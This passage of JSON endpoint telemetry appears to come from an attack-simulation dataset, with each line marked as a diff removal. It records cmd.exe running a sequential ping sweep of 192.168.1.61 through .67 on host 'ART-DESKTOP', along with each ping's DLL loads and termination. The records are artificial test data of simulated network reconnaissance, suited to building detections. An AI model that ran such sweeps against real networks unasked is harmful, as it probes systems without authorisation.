"image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572272140000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "event_type": "process", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572276830000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-001036095201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.61", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572276980000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "event_type": "process", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572281840000, - "unique_pid": "{42FC7E13-CB6B-5C05-0000-0010B40B5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.62", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572281980000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "event_type": "process", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572286990000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010230E5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.63", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6236, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287140000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572287300000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "event_type": "process", - "pid": 6236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572291830000, - "unique_pid": "{42FC7E13-CB6C-5C05-0000-0010AB105201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.64", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5388, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572291980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572291990000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "event_type": "process", - "pid": 5388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572296830000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-001037135201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.65", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4656, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572297020000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572296980000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "event_type": "process", - "pid": 4656, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572301840000, - "unique_pid": "{42FC7E13-CB6D-5C05-0000-0010DB155201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.66", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7784, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572302020000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572301980000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "event_type": "process", - "pid": 7784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572306840000, - "unique_pid": "{42FC7E13-CB6E-5C05-0000-00107C185201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.67", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4164, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 